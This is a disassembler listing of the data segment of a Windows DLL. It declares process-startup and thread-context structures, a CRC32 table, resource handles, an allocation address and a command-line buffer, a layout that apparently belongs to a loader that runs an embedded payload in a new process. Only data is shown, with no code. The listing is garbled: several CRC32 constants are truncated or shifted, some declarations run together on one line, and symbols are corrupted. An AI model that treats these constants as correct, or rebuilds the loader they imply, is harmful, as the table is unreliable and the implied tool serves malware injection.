; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 10003000h
; struct _STARTUPINFOA StartupInfo
StartupInfo _STARTUPINFOA <0> ; DATA XREF: sub_10001208+14B�o
; struct _PROCESS_INFORMATION ProcessInformation
ProcessInformation _PROCESS_INFORMATION <0> ; DATA XREF: sub_10001208+146�o
; sub_10001208+195�r ...
; CONTEXT Context
Context CONTEXT <0> ; DATA XREF: sub_10001208+168�w
; sub_10001208+172�o ...
dword_10003320 dd 0 dd 77073096h, 0EE0E612Ch, 990951BAh, 76DC419h, 706AF48Fh
dd 0E963A535h, 9E6495A3h, 0EDB8832h, 79DCB8A4h, 0E0D5E91Eh
dd 97D2D988h, 9B64C2Bh, 7EB17CBDh, 0E7B82D07h, 90BF1D91h
dd 1DB71064h, 6AB020F2h, 0F3B97148h, 84BE41DEh, 1ADAD47Dh
dd 6DDDE4EBh, 0F4D4B551h, 83D385C7h, 136C9856h, 646BA8C0h
dd 0FD62F97Ah, 8A65C9ECh, 14015C4Fh, 63066CD9h, 0FA0F3D63h
dd 8D080DF5h, 3B6E20C8h, 4C69105Eh, 0D56041E4h, 0A2677172h
dd 3C03E4D1h, 4B04D447h, 0D20D85FDh, 0A50AB56Bh, 35B5A8FAh
dd 42B2986Ch, 0DBBBC9D6h, 0ACBCF940h, 32D86CE3h, 45DF5C75h
dd 0DCD60DCFh, 0ABD13D59h, 26D930ACh, 51DE003Ah, 0C8D75180h
dd 0BFD06116h, 21B4F4B5h, 56B3C423h, 0CFBA9599h, 0B8BDA50Fh
dd 2802B89Eh, 5F058808h, 0C60CD9B2h, 0B10BE924h, 2F6F7C87h
dd 58684C11h, 0C1611DABh, 0B6662D3Dh, 76DC4190h, 1DB7106h
dd 98D220BCh, 0EFD5102Ah, 71B18589h, 6B6B51Fh, 9FBFE4A5h
dd 0E8B8D433h, 7807C9A2h, 0F00F934h, 9609A88Eh, 0E10E9818h
dd 7F6A0DBBh, 86D3D2Dh, 91646C97h, 0E6635C01h, 6B6B51F4h
dd 1C6C6162h, 856530D8h, 0F262004Eh, 6C0695EDh, 1B01A57Bh
dd 8208F4C1h, 0F50FC457h, 65B0D9C6h, 12B7E950h, 8BBEB8EAh
dd 0FCB9887Ch, 62DD1DDFh, 15DA2D49h, 8CD37CF3h, 0FBD44C65h
dd 4DB26158h, 3AB551CEh, 0A3BC0074h, 0D4BB30E2h, 4ADFA541h
dd 3DD895D7h, 0A4D1C46Dh, 0D3D6F4FBh, 4369E96Ah, 346ED9FCh
dd 0AD678846h, 0DA60B8D0h, 44042D73h, 33031DE5h, 0AA0A4C5Fh
dd 0DD0D7CC9h, 5005713Ch, 270241AAh, 0BE0B1010h, 0C90C2086h
dd 5768B525h, 206F85B3h, 0B966D409h, 0CE61E49Fh, 5EDEF90Eh
dd 29D9C998h, 0B0D09822h, 0C7D7A8B4h, 59B33D17h, 2EB40D81h
dd 0B7BD5C3Bh, 0C0BA6CADh, 0EDB88320h, 9ABFB3B6h, 3B6E20Ch
dd 74B1D29Ah, 0EAD54739h, 9DD277AFh, 4DB2615h, 73DC1683h
dd 0E3630B12h, 94643B84h, 0D6D6A3Eh, 7A6A5AA8h, 0E40ECF0Bh
dd 9309FF9Dh, 0A00AE27h, 7D079EB1h, 0F00F9344h, 8708A3D2h
dd 1E01F268h, 6906C2FEh, 0F762575Dh, 806567CBh, 196C3671h
dd 6E6B06E7h, 0FED41B76h, 89D32BE0h, 10DA7A5Ah, 67DD4ACCh
dd 0F9B9DF6Fh, 8EBEEFF9h, 17B7BE43h, 60B08ED5h, 0D6D6A3E8h
dd 0A1D1937Eh, 38D8C2C4h, 4FDFF252h, 0D1BB67F1h, 0A6BC5767h
dd 3FB506DDh, 48B2364Bh, 0D80D2BDAh, 0AF0A1B4Ch, 36034AF6h
dd 41047A60h, 0DF60EFC3h, 0A867DF55h, 316E8EEFh, 4669BE79h
dd 0CB61B38Ch, 0BC66831Ah, 256FD2A0h, 5268E236h, 0CC0C7795h
dd 0BB0B4703h, 220216B9h, 5505262Fh, 0C5BA3BBEh, 0B2BD0B28h
dd 2BB45A92h, 5CB36A04h, 0C2D7FFA7h, 0B5D0CF31h, 2CD99E8Bh
dd 5BDEAE1Dh, 9B64C2B0h, 0EC63F226h, 756AA39Ch, 26D930Ah
dd 9C0906A9h, 0EB0E363Fh, 72076785h, 5005713h, 95BF4A82h
dd 0E2B87A14h, 7BB12BAEh, 0CB61B38h, 92D28E9Bh, 0E5D5BE0Dh
dd 7CDCEFB7h, 0BDBDF21h, 86D3D2D4h, 0F1D4E242h, 68DDB3F8h
dd 1FDA836Eh, 81BE16CDh, 0F6B9265Bh, 6FB077E1h, 18B74777h
dd 88085AE6h, 0FF0F6A70h, 66063BCAh, 11010B5Ch, 8F659EFFh
dd 0F862AE69h, 616BFFD3h, 166CCF45h, 0A00AE278h, 0D70DD2EEh
dd 4E048354h, 3903B3C2h, 0A7672661h, 0D06016F7h, 4969474Dh
dd 3E6E77DBh, 0AED16A4Ah, 0D9D65ADCh, 40DF0B66h, 37D83BF0h
dd 0A9BCAE53h, 0DEBB9EC5h, 47B2CF7Fh, 30B5FFE9h, 0BDBDF21Ch
dd 0CABAC28Ah, 53B39330h, 24B4A3A6h, 0BAD03605h, 0CDD70693h
dd 54DE5729h, 23D967BFh, 0B3667A2Eh, 0C4614AB8h, 5D681B02h
dd 2A6F2B94h, 0B40BBE37h, 0C30C8EA1h, 5A05DF1Bh, 2D02EF8Dh
; HRSRC hResInfo
hResInfo dd 0 ; DATA XREF: sub_10001078+B�w
; sub_10001078+1D�r
; HGLOBAL hResData
hResData dd 0 ; DATA XREF: sub_10001078+18�w
; sub_10001078+2F�r
dword_10003728 dd 0 ; sub_10001078+45�r ...
; LPVOID lpAddress
lpAddress dd 0 ; DATA XREF: .text:10001010�r
; sub_10001078+81�w ...
dword_10003730 dd 0 ; sub_10001078+3F�r ...
; SIZE_T dwSize
dwSize dd 0 ; DATA XREF: sub_10001078+68�w
; sub_10001078+74�r ...
dword_10003738 dd 0 ; sub_10001146+2F�r ...
dword_1000373C dd 0 ; sub_10001146+3A�r ...
dword_10003740 dd 0 ; sub_10001146:loc_100011B7�r ...
dword_10003744 dd 0 ; sub_10001146+6B�r ...
dword_10003748 dd 0 ; sub_10001208+3F�r
dd 2 dup(0)
; SIZE_T dword_10003754
dword_10003754 dd 0 ; sub_10001208+23�r ...
; LPCVOID lpBuffer
lpBuffer dd 0 ; DATA XREF: sub_10001208+30�w
; sub_10001208+35�r ...
dword_1000375C dd 0 ; sub_10001208+8F�r ...
dword_10003760 dd 0 ; sub_10001208+6D�r ...
dword_10003764 dd 0 dword_10003768 dd 0 ; sub_10001208+E4�w ...
dword_1000376C dd 0 dword_10003770 dd 0 ; sub_10001146+60�w ...
dword_10003774 dd 0 ; sub_10001022+2C�r
dword_10003778 dd 0 ; sub_10001022+31�r
dword_1000377C dd 0 ; sub_10001022+39�r
; char CommandLine[]
CommandLine db 80h dup(0) ; DATA XREF: sub_10001208+13A�o
; sub_10001208+15C�o
_data ends
end start